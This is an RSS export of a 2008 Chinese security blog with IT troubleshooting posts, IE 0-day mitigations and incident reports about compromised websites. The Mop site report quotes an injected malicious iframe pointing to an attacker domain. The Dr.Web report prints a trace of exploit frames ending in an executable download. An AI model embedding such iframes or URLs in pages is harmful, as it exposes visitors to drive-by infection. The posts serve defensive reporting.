<![CDATA[ICKA'S 垃圾桶]]> http://www.icka.com.cn/blog/index.php zh-cn http://www.icka.com.cn/blog/read.php?197 <![CDATA[Bo-Blog V2.1.1 正式版发布【转】]]> icka <icka#163.com> Fri, 26 Dec 2008 12:43:42 +0000 http://www.icka.com.cn/blog/read.php?197
2.1.1是2.1.0之后的又一个升级版本,包含诸多特性。建议所有旧版用户升级。

2.1.1的更新之处有:
*后台操作全方位启用Ajax,大大提高工作效率。
*程序功能一键式屏蔽。
*OpenID 有限登入支持。
*指定自定义404页面。
其他许多细小更新之处和bug修正,请查阅安装包内的changelog文档。

升级方法(从2.1.0正式版以前的任何版本):
1 请务必先正确升级到 2.1.0 正式版。
2 按照 2.1.0 正式版到2.1.1的升级方法升级。

升级方法(从2.1.0正式版):
1 下载文末的2.1.0专用升级包,直接覆盖所有文件。本次升级不需要改动数据库。
务必检查上传的文件是否完整,如有文件为 0 字节则多半是上传不正常,会导致我们无法解答的奇特问题。
2 为确保正常使用,建议清空浏览器缓存。

升级方法(从2.1.1的其它测试版):
1 也请使用文末的2.1.0专用升级包,直接覆盖所有文件。
务必检查上传的文件是否完整,如有文件为 0 字节则多半是上传不正常,会导致我们无法解答的奇特问题。
2 为确保正常使用,建议清空浏览器缓存。


下载 2.1.1正式版 完整安装包:
下载
下载适用于2.1.0正式版的升级包:(2.1.1测试版升级也可用此升级包)
下载


讨论2.1.1:
请到我们的论坛讨论这个版本。
发帖时,务必注明您正在使用的版本!
转自:http://www.bo-blog.com/weblog/boblog-211-release/

Tags - ]]> http://www.icka.com.cn/blog/read.php?196 <![CDATA[针对卡巴斯基企业版客户端病毒库反复更新总为旧病毒库的解决方法]]> icka <icka#163.com> Thu, 25 Dec 2008 08:54:54 +0000 http://www.icka.com.cn/blog/read.php?196 第一:病毒库更新失败,卡巴斯基企业版有两个更新源,分别是卡巴斯基管理服务器和卡巴斯基官方病毒更新服务器,既然无法更新病毒库,则一般是设置错误或者无法连接到上面两个更新源。在更新窗口会提示“物理连接错误”或者“DNS解析错误”,物理连接错误,需要覆盖安装下网络代理,DNS解析错误是说明本机无法连接到外网。
第二:病毒库更新成功,但病毒库依旧是老的病毒库,则一般是从卡巴斯基管理服务器更新的病毒库,但是卡巴斯基管理服务器上的病毒库一直没有更新。需要检查管理服务器,可能情况包括
1:更新路径选择的本地离线病毒库,是固定日期的,这样全局更新任务无论怎么执行病毒库会始终为此离线病毒库。
2:无法连接到卡巴斯基官方病毒库更新服务器,这样管理服务器中的病毒库无法得到更新。
3:病毒库更新任务出错导致更新任务无法执行。
Tags - , ]]> http://www.icka.com.cn/blog/read.php?195 <![CDATA[猫扑(mop)新闻社区被挂病毒]]> icka <icka#163.com> Thu, 25 Dec 2008 03:59:33 +0000 http://www.icka.com.cn/blog/read.php?195 被挂病毒,首页增加代码

<iframe src=http://www.falaliii.cn/llsg/14.htm width=50 height=0 border=0></iframe>

可以见
http://bbs.kafan.cn/thread-392365-1-1.html

Tags - ]]> http://www.icka.com.cn/blog/read.php?193 <![CDATA[卡巴斯基企业版管理工具全局任务病毒库更新任务出错的解决方法]]> icka <icka#163.com> Tue, 23 Dec 2008 00:41:21 +0000 http://www.icka.com.cn/blog/read.php?193 第一种方法:

可以右键管理工具全局任务的此更新任务,选择“删除”,然后关闭卡巴斯基管理工具。
点击在新窗口中浏览此图片


点击“开始”---“运行”输入

msiexec /f {12C259B1-8E8C-498D-927D-60040190BF79}

回车
点击在新窗口中浏览此图片

卡巴斯基管理工具开始修复

点击在新窗口中浏览此图片
等进行完成后,点击“开始”--“运行”输入

services.msc

启动“卡巴斯基管理服务器”、“卡巴斯基网络代理”两个服务。

点击在新窗口中浏览此图片

点击在新窗口中浏览此图片
启动卡巴斯基管理工具
在全局任务里重新建立管理工具病毒库更新任务即可。

点击在新窗口中浏览此图片
点击在新窗口中浏览此图片
点击在新窗口中浏览此图片
点击在新窗口中浏览此图片
点击在新窗口中浏览此图片
点击在新窗口中浏览此图片


第2种方法:
下载http://icka.com.cn/kabadown/index.php?dirpath=./修复工具&order=0中的kldupfix.rar修复。


Tags - , ]]> http://www.icka.com.cn/blog/read.php?192 <![CDATA[常用的给系统打补丁的方法]]> icka <icka#163.com> Fri, 19 Dec 2008 06:57:27 +0000 http://www.icka.com.cn/blog/read.php?192
补丁包括系统本身的安全补丁及其系统所安装的第三方应用软件的补丁。


打系统补丁可以选择

一:打开自动更新,右键我的电脑选择属性,选择 “自动更新”根据自己的情况选择以什么方式来更新及其安装(建议选择自定义那个),针对WINXP SP2记得有几个补丁可以根据自己的选择不进行安装,1)WGA补丁,也就是验证你系统是否是盗版的受害者,现在盗版的系统还是比较多的,打了可能会黑屏的2)IE7.0如果你比较习惯使用IE6,那就不用下载这个补丁了,当然整体7还是6好点的3)WIN XP SP3补丁,这个补丁几百兆,要是你不想升级到SP3,那么这个也是可以不下载安装。微软在线更新地址为
http://windowsupdate.microsoft.com/

二,使用第3方工具(部分工具支持检测第3方软件的漏洞)

1:360安全卫士  http://www.360.cn

2:金山清理专家 http://www.duba.net/zt/ksc/ksc2/

3:超级兔子升级天使  http://www.pctutu.com/srupdate/

4:

三,使用第三方补丁包

网上会有定期的完整补丁包提供下载

例如http://soft.ylmf.com/downlist/47.html可以自行进行搜索。
Tags - , ]]> http://www.icka.com.cn/blog/read.php?191 <![CDATA[针对系统userinit.exe被删除的解决方法]]> icka <icka#163.com> Thu, 18 Dec 2008 07:36:18 +0000 http://www.icka.com.cn/blog/read.php?191 删除掉userinit.exe会导致机器使用停留在登陆界面无法进入到桌面
删除掉rpcss.dll会导致机器任务栏的内容不显示、系统复制粘贴功能失效。

rpcss.dll丢失可以从http://www.icka.com.cn/safe/ 中的zhengchangwenjian中下载对应版本到system32路径下即可,如果从其他地方拷贝到电脑上的,因为没有复制粘贴功能了,所以只能选择MS-DOS命令copy拷贝文件到系统目录里

userinit.exe被删除,系统会启动不起来,我们可以使用两种方法恢复:

第一种方法可以使用winpe光盘引导系统,然后将对应的系统文件拷贝到system32目录下即可。
第二种方法可以使用对应版本的完整安装盘来恢复(不能使用GHOST盘恢复,因为上面没有需要的系统的单个文件)

以WINXP为例:

1:本例系统为WINDOWS XP SP2,所以需要将WINDOWS XP SP2光盘放入光驱,设置开机从光盘引导系统:
点击在新窗口中浏览此图片
2:按"R"进入恢复控制台。
3:根据自己的系统情况选择,本例只有一个WINXP系统并且安装在C盘下,这里按“1”,然后输入管理员密码,回车。
点击在新窗口中浏览此图片
4:确认下光盘所分配的盘符号,本例为E。
点击在新窗口中浏览此图片
5:从光盘提取文件到本地系统中。
使用命令

expand X:\i386\userinit.ex_ c:\windows\system32\  

注:X为光盘实际盘符  ex_后面有一个空格
点击在新窗口中浏览此图片
本例中先提前将userinit.exe删除掉,然后使用命令提取文件,最后用DIR命令查看也确实提取成功了。
完毕!






Tags - , , ]]> http://www.icka.com.cn/blog/read.php?190 <![CDATA[微软发布针对IE的0Day漏洞非常规补丁(MS08-078)]]> icka <icka#163.com> Thu, 18 Dec 2008 01:35:35 +0000 http://www.icka.com.cn/blog/read.php?190 http://www.microsoft.com/technet/security/bulletin/ms08-078.mspx
大家按照对应的系统及其IE版本下载对应的补丁即可。
IE6(XP SP2 and SP3):
 http://download.microsoft.com/download/6/B/F/6BFE902B-39A0-422E-B4F7-90147AD0921E/WindowsXP-KB960714-x86-CHS.exe

  IE7(XP SP2 and SP3):
  http://download.microsoft.com/download/F/1/C/F1C06266-86BE-407A-A693-223A89500E8D/IE7-WindowsXP-KB960714-x86-CHS.exe

  Vista :
  http://download.microsoft.com/download/4/1/D/41D1E00B-D222-4025-B798-58A2D15F054D/Windows6.0-KB960714-x86.msu
Tags - , ]]> http://www.icka.com.cn/blog/read.php?189 <![CDATA[Microsoft 安全通报:4 种方法暂时屏蔽 IE 最新 0day[转]]]> icka <icka#163.com> Sun, 14 Dec 2008 01:19:23 +0000 http://www.icka.com.cn/blog/read.php?189 IE 最新 0day 波及了微软全线系统,目前暂时没有补丁。微软于近日发布了一份安全通报,指导您如何暂时屏蔽此漏洞。
漏洞出在 OLEDB32.dll 这个文件上。所以我们的目的就是屏蔽这个文件。对此,微软连出了4个杀手锏:
1. SACL 法
2. 禁用 Row Position 功能法
3. 取消 DLL 注册法
4. 权限设置法
详情请见:


1. SACL 法
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[File Security]
"%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll",2,"S:(ML;;NWNRNX;;;ME)"

将以上内容保存为 BlockAccess_x86.inf
然后在命令提示符里执行 SecEdit/configure/db BlockAccess.sdb/cfg <inf file>
其中 <inf file> 为 inf 文件路径。若成功会看到“操作成功完成”的提示。

2. 禁用 Row Position 功能法


HKEY_CLASSES_ROOT\CLSID\{2048EEE6-7FA2-11D0-9E6A-00A0C9138C29}
打开注册表编辑器,将此键删除即可。

3. 取消 DLL 注册法

在命令提示符中输入 Regsvr32.exe/u "Program Files\Common Files\System\Ole DB\oledb32.dll"
即可

4. 权限设置法

在命令提示符中输入 cacls "Program Files\Common Files\System\Ole DB\oledb32.dll"/E/P everyone:N

Vista 系统则需要输入3个命令:

takeown/f "Program Files\Common Files\System\Ole DB\oledb32.dll"
icacls "Program Files\Common Files\System\Ole DB\oledb32.dll"/save %TEMP%\oledb32.32.dll.TXT
icacls "Program Files\Common Files\System\Ole DB\oledb32.dll"/deny everyone:(F)

其中第一种方法影响最小(只影响 IE 对此 DLL 的访问)。


附:此漏洞影响的系统、软件列表

Windows Internet Explorer 7
Windows Internet Explorer 7 for Windows XP
Windows Internet Explorer 7 for Windows Server 2003
Windows Internet Explorer 7 for Windows Server 2003 IA64
Windows Internet Explorer 7 in Windows Vista
Windows Internet Explorer 8 Beta
Microsoft Internet Explorer 6.0 Service Pack 2
Microsoft Internet Explorer 6.0 Service Pack 1
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.01 Service Pack 4
Windows Server 2008 Datacenter without Hyper-V
Windows Server 2008 Enterprise without Hyper-V
Windows Server 2008 for Itanium-Based Systems
Windows Server 2008 Standard without Hyper-V
Windows Server 2008 Datacenter
Windows Server 2008 Enterprise
Windows Server 2008 Standard
Windows Web Server 2008
Windows Vista Service Pack 1, when used with:
Windows Vista Business
Windows Vista Enterprise
Windows Vista Home Basic
Windows Vista Home Premium
Windows Vista Starter
Windows Vista Ultimate
Windows Vista Enterprise 64-bit Edition
Windows Vista Home Basic 64-bit Edition
Windows Vista Home Premium 64-bit Edition
Windows Vista Ultimate 64-bit Edition
Windows Vista Business 64-bit Edition
Microsoft Windows Server 2003 Service Pack 1, when used with:
Microsoft Windows Server 2003, Standard Edition (32-bit x86)
Microsoft Windows Server 2003, Enterprise Edition (32-bit x86)
Microsoft Windows Server 2003, Datacenter Edition (32-bit x86)
Microsoft Windows Server 2003, Web Edition
Microsoft Windows Server 2003, Datacenter Edition for Itanium-Based Systems
Microsoft Windows Server 2003, Enterprise Edition for Itanium-based Systems
Microsoft Windows Server 2003, Datacenter x64 Edition
Microsoft Windows Server 2003, Enterprise x64 Edition
Microsoft Windows Server 2003, Standard x64 Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 Service Pack 2, when used with:
Microsoft Windows Server 2003, Standard Edition (32-bit x86)
Microsoft Windows Server 2003, Enterprise Edition (32-bit x86)
Microsoft Windows Server 2003, Datacenter Edition (32-bit x86)
Microsoft Windows Server 2003, Web Edition
Microsoft Windows Server 2003, Datacenter x64 Edition
Microsoft Windows Server 2003, Enterprise x64 Edition
Microsoft Windows Server 2003, Standard x64 Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003, Datacenter Edition for Itanium-Based Systems
Microsoft Windows Server 2003, Enterprise Edition for Itanium-based Systems
Microsoft Windows XP Service Pack 2, when used with:
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional
Microsoft Windows XP Service Pack 3, when used with:
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional
对于非 x86 系统请参考微软安全通报自行操作
FlowerCode@cnBeta 概括自微软安全通报

Tags - , ]]> http://www.icka.com.cn/blog/read.php?188 <![CDATA[2008.12.13DR.WEB中国区代理 道特韦伯(北京)网站被挂病毒]]> icka <icka#163.com> Sat, 13 Dec 2008 06:44:41 +0000 http://www.icka.com.cn/blog/read.php?188 点击在新窗口中浏览此图片


Log is generated by FreShow.
[wide]http://www.drweb.com.cn
    [script]http://www.drweb.com.cn/Scripts/AC_RunActiveContent.js
    [frame]http://g.dsfgr.cn/ko.htm
        [frame]http://g.dsfgr.cn/Flash.htm
            [frame]http://g.dsfgr.cn/ihhh.html
            [frame]http://g.dsfgr.cn/fhhh.html
        [frame]http://g.dsfgr.cn/Access.htm
            [color=red][object]http://ad.ote2008.info/ad.css[/color]
        [frame]http://g.dsfgr.cn/ie.htm  -->http://jbl.trcwoman.info/ie.exe
        [frame]http://g.dsfgr.cn/Ms06014.htm
        [frame]http://g.dsfgr.cn/Lz.htm
        [frame]http://g.dsfgr.cn/Bfyy.htm
        [frame]http://g.dsfgr.cn/Access.htm
        [frame]http://g.dsfgr.cn/Cx.htm
        [frame]http://g.dsfgr.cn/XunLei.htm
        [frame]http://g.dsfgr.cn/sina.htm
        [frame]http://g.dsfgr.cn/Real.htm
        [frame]http://g.dsfgr.cn/Real11.htm
        [script]http://js.tongji.cn.yahoo.com/872312/ystat.js

Tags - ]]> http://www.icka.com.cn/blog/read.php?187 <![CDATA[转:注意IE7的0-DAY漏洞,官方暂无补丁,附补救措施]]> icka <icka#163.com> Fri, 12 Dec 2008 01:19:40 +0000 http://www.icka.com.cn/blog/read.php?187
在2008年下半年开始有流传IE7的漏洞,并于10月份左右开始流出私人买卖,于11月份流入黑市买卖,开始有人面谈出售。

最终出现在网络的具体时间为12月份,大量二手三手漏洞在黑产运作层流通,并且于12月份初开始有大量的人购买二手代码去开发生成器,在9号开始出现在挂马利用上。


系统:

WINDOWS XP

WINDOWS 2003

浏览器:

IE7

描述:

由于SDHTML里处理对象存在在错误导致内存紊乱。
构造某种条件可以使得SDHTML检测到错误释放已被分配的对象,但是释放已被分配的对象后SDHTML并未返回而是继续使用被释放的对象的内存执行,如果这些内存又被分配给其他用途,将导致SDHTML把这些内存当作一个对象来操作。0DAY挂马里使用了XML的SRC字符串对象占用了这些释放对象的空间,而对象指针里包含函数例程指针,最终导致代码执行 。

由于该漏洞尚未被修补,具体细节请等待微软官方发布补丁的详细参考。

防御:

1.请关注微软官方网站及时下载补丁。

2. 开启DEP保护:

系统属性——高级——性能——数据执行保护

可以防止恶意攻击。

3.将wwwwyyyyy.cn以及sllwrnm5.cn加入HOSTS进行屏蔽。

复制一下代码进入HOSTS即可:

127.0.0.1   wwwwyyyyy.cn

127.0.0.1   sllwrnm5.cn



127.0.0.1   sllwrnm5.cn
以上内容转自  剑盟

12.11日江民推出的补丁有BUF不推荐使用了。

目前推荐使用的补丁包括:
360的IE7 XML 0day补丁(需安装360) ——不安装补丁仅装360,会拦截病毒下载过程。安装补丁后直接拦截这个0day溢出,内存不会彪涨
金山清理专家网页防挂马 ——拦截病毒下载和运行过程,溢出不拦截
瑞星09  
(pluto1313测试)
微软官方推出的屏蔽方法见
http://www.icka.com.cn/blog/read.php?189



Tags - , ]]>